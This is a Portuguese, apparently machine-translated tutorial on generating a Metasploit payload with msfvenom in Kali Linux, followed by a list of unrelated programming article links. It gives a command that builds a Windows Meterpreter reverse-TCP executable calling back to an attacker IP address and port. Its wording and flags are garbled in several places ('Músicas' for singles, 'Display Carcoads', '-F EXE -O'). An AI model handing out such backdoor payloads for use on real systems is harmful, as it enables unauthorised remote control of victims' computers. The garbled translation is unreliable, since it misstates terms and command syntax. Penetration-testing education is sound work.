Como criar carga útil com metasploit

Bryant Rowe Sr.
Como criar carga útil com metasploit

A metasploit é uma das plataformas mais usadas para realizar testes de penetração, hackers e até jogos informais. Precisamos compreender como os componentes e cargas úteis funcionam para usá -las efetivamente. Em termos simplistas, uma carga útil é uma ação que deve ser executada quando uma exploração concluiu sua execução. Uma carga útil faz parte do código que a exploração executa. Explorações são usadas para obter acesso a um sistema e as cargas úteis realizam tarefas específicas. A metasploit tem muitas cargas úteis, como conchas reversas, conchas de ligação, medidor e outros. Várias cargas úteis funcionarão com mais explorações; No entanto, encontrar a carga útil adequada que funcionará com a exploração requer alguma investigação. Depois de decidir uma exploração, use o comando "Display Carcoads" do Metasploit para obter uma lista de cargas úteis que funcionarão com ele.

Tipos de cargas úteis

No metasploit, existem alguns tipos diferentes de cargas úteis. Esses três tipos básicos são os que você acabará por acabar usando mais:

Músicas

Os solteiros são extremamente pequenos e destinados a iniciar uma conversa antes de passar para outro estágio.

Estagiários

A carga útil usa o stager para estabelecer uma conexão de rede entre o sistema de destino e o processador de carga útil do servidor de metasploit. O stager permite carregar e inserir uma carga útil maior e mais complicada denominada estágio usando uma carga útil menor.

Meterpreter

O Meterpreter tornou -se uma carga útil de ataque de metasploit que fornece um fator de intruso que afeta como navegar e executar o código na máquina de destino. Meterpreter é um aplicativo somente de memória que não escreve para disco. O Meterpreter tentou se injetar no processo atacado, de onde pode passar para outros processos operacionais; Portanto, nenhum novo processo é gerado. O Meterpreter foi criado para evitar as desvantagens do uso de cargas úteis especializadas, permitindo a escrita de comandos e garantindo comunicação criptografada. A desvantagem do emprego de cargas úteis específicas é que os alarmes podem ser levantados se um processo mais novo iniciar em todo o sistema de destino.

Criando carga útil com metasploit no Kali Linux

Para criar carga útil com o metasploit no Kali Linux, siga todas as etapas descritas abaixo:

Etapa 1: Acessando o msfconsole

msfconsole é o único meio de acessar a maioria da funcionalidade do metasploit. msfconsole fornece à plataforma uma interface baseada em console. msfconsole tem sido a interface MSF com os melhores recursos e é o mais estável. A capacidade completa da readline, a tabbing e a conclusão de comando são todos fornecidos pelo MSFCONSOLE. Comandos externos podem ser executados no msfconsole. Use o seguinte comando declarado para acessar o msfconsole no kali linux.

$ msfconsole

Etapa 2: Acessando MSFVenom

A carga útil que fabricamos usando msfvenom será uma carga útil reversa de TCP. Essa carga útil cria um executável que, quando iniciado, estabelece uma conexão entre o computador do usuário e nosso manipulador de metasploit, permitindo -nos realizar uma sessão de Meterpreter. Use o seguinte comando declarado para acessar o msfvenom no kali linux.

$ msfvenom -p

Etapa 3: Criando carga útil

Use o seguinte comando declarado para criar uma carga útil no metasploit no Kali Linux.

$ msfvenom -p windows/meterpreter/reverse_tcp lhost = 192.168.43.28 LPORT = 6001 -F EXE -O PAPAR.exe


Você pode usar a opção -p para indicar qual carga útil você deseja utilizar. LHOST parece ser o endereço IP do atacante ao qual você deseja que a carga útil vincule. LPORT é o mesmo que acima; Esta é a porta para a qual a carga útil se vinculará e deve ser configurada no manipulador. -f instrui o msfvenom como gerar a carga útil; Nesse caso, estamos indo para um programa executável ou exe. A carga útil criada pela execução do comando acima é 73802 bytes, como mostrado a partir da imagem acima mencionada.

Para verificar onde foi criado, navegaremos em direção ao diretório doméstico. Na captura de tela abaixo, você pode verificar se a carga.exe foi criado com sucesso.

Você pode verificar suas propriedades clicando duas vezes. O tamanho da carga útil criada é a mesma que foi mostrada na tela do terminal.

Conclusão

Este artigo forneceu uma breve introdução relacionada a cargas úteis e seus tipos. Seguimos instruções passo a passo para criar cargas úteis no metasploit no sistema operacional Kali Linux.

C Programação
Livros e guias para a linguagem C
Existem 6 livros e guias úteis para aprender a linguagem C. Siga este artigo para aprender em detalh...
Tommie Konopelski
C ++
Como usar a instrução Switch em C++?
A instrução Switch é uma instrução condicional em C ++ que testa uma variável contra vários valores ...
Mr. Warren Cummerata
C nítido
Qual é a diferença entre classe e objeto em C#
Uma classe é um plano ou modelo que define as características e comportamentos de um tipo particular...
Mr. Warren Cummerata
Pitão
Personagens de contagem de python em string
Tommie Konopelski
Pitão
Python nem todos os argumentos convertidos durante a formatação da string
Tommie Konopelski
Windows OS
O que é o Windows Package Manager
Tommie Konopelski
html
Como usar a propriedade Mouseevent Pagey?
Evan Mueller
php
O que é um erro de índice indefinido no PHP e como corrigi -lo?
Joey Bartoletti
Docker
Quais são as etapas para executar o nginx em um recipiente do Docker no Ubuntu Top 10.Top 10?
Jackie Blanda
Powershell
Como usar operadores de comparação em PowerShell?
Jackie Blanda
AWS
Como o EC2 é diferente do Elastic Beanstalk?
Marlon Bernhard
AWS
Qual é a diferença entre a AWS Aurora e Mysql?
Tommie Konopelski
Git
Como gerar um arquivo Git usando o terminal? | Explicado
Mr. Warren Cummerata